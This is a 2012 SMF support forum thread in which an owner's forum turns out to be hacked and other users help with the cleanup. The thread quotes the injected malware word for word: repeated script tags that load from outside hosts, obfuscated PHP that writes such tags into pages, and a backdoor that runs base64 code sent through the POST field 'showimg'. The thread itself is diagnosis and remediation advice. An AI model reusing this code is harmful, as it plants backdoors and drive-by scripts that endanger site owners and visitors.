Weird indexing issue? Need help

Started by Alb0, April 29, 2012, 11:30:13 PM

Previous topic - Next topic

Alb0

So this just recently started happening with my site, which I have the slightest clue as to why. Whenever you visit my site, www.velocity-server.com , you'll notice that the indexing of the template is weirdly off, looking at the search box. Also the text is enlarged creating an off look to it.
Although, if you refresh the page about 2 times, everything reverts back to normal, and the issue disappears. I haven't downloaded any mods as of late, and I also un-installed the very last mods I implemented, just to be on the safe side, yet the issue still exists.

Any idea as to what it could be?  :(

My forum is currently running on SMF 2.0.2

vbgamer45

Your website has been hacked code injected into your files.
If you view the source of your webpage very first line

<script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head
Community Suite for SMF - Take your forum to the next level built for SMF, Gallery,Store,Classifieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store SMF Classifieds Ad Seller Pro

Alb0

Oh my. Any possible way to extract that, and prevent it from happening again? I'm very limited when it comes to this, so I apologize if I may seem ignorant.
Should I be worried? That sounds serious.

vbgamer45

Yeah I would do a backup of your files and database. Then reinstall the SMF files for your forum.
I do recommend deleting the files first before reuploading the SMF files if possible
Community Suite for SMF - Take your forum to the next level built for SMF, Gallery,Store,Classifieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store SMF Classifieds Ad Seller Pro

Alb0

Oh this is gonna be terrible. I backed up my whole database, backed up my whole directory to the forums as well. I tried re-installing SMF, overwriting the files, yet I ran into quite a bit of trouble. Was getting errors left and right. This is sad as my forum is pretty huge with 9k+ posts.

Which files do you recommend deleting first? And did you mean reupload ALL the SMF files? Or just certain ones

vbgamer45

Community Suite for SMF - Take your forum to the next level built for SMF, Gallery,Store,Classifieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store SMF Classifieds Ad Seller Pro

Alb0

So what you're basically saying is a fresh re-install of SMF? That would mean I would have to do everything over, come to mods, custom work, everything? This is a real bummer. As I don't see any other way.

Alb0

This code seems to have been inserted into most of the PHP files, which wasn't there prior.

Quote$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}

Any clue how I could remove that from the PHP files without have to go through each single one?

roqueiro

#8
I found this:
Quote
$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;}                                    
                                    $s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;}   

And this:
Quoteglobal $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "[url="http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200)"]http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200)[/url]; echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

In this files:
Base folder:
index.php
Settings.php

Sources folder:
Admin.php
Aeva-Sites.php
CustomForm.php
Display.php
Load.php
ManageBoards.php
ManageMaintenance.php
ManageSettings.php
ModerationCenter.php
ModSettings.php
PersonalMessage.php
Poll.php
Post.php
Profile-View.php
ScheduledTasks.php
Subs.php
Subs-Aeva.php
Subs-Aeva-Admin.php
Subs-Aeva-Custom-Example.php
Subs-Aeva-Sites.php
Subs-Boards.php
Subs-Editor.php
Subs-Members.php
Subs-Menu.php
Subs-Package.php
Subs-TopicRating.php

Themes\Default folder:
MessageIndex.template.php
TopicRating.template.php

Themes\Default\Language folder:
ManageScheduledTasks.english.php
Modifications.english.php
Modifications.portuguese_brazilian-utf8.php
TopicRating.english.php
TopicRating.russian.php
TopicRating.russian-utf8.php
TopicRating.spanish_es-utf8.php

Themes\Mytheme folder:
MessageIndex.template

IDK how this files as been hacked/modified. The modified date as not been changed.
For security, after correct files, change passwords.

Modify reason: Add Themes\Default\Language folder:

thecity

#9
I know someone using Wordpress, he has exact the same problem.
All the plugin files are infected with this malicious code.

Warning your host is a good idea. Those ****** russians..

MrPhil

Disable your site (put it in maintenance mode) so if the hack contains any drive-by infections, your users have less of a chance of picking up something while you do cleanup. Even better would be to insert an index.html file that just says "Sorry, temporarily closed while cleaning up.".

First, you need to figure out how the hacker got in and plug up those security holes before doing anything else. Work with your host to look at access logs. Check that you aren't granting ridiculous permissions such as 777 all over the place. Scan your PC (used to administer the site and forum) for spyware, password sniffers, and keystroke loggers. Enable the PC firewall and make sure the antivirus scanner is working. Change all the passwords: site account access, SMF Admin, FTP, and even the database if you feel up to it.

Then you either

  • edit the files one by one, or
  • erase all files EXCEPT Settings.php, Settings_bak.php, avatars, and attachments, and either

    • restore all files from a known good backup, or
    • copy in all the files in a "Large Upgrade" to refresh your SMF system, then re-install all mods and custom work

You want to make sure you don't leave any unaccounted-for files lying around, that might be backdoors or Trojans. Most hacks don't involve the database, but keep an eye out for any evidence that has happened (that will be an ugly cleanup job!).

Advertisement: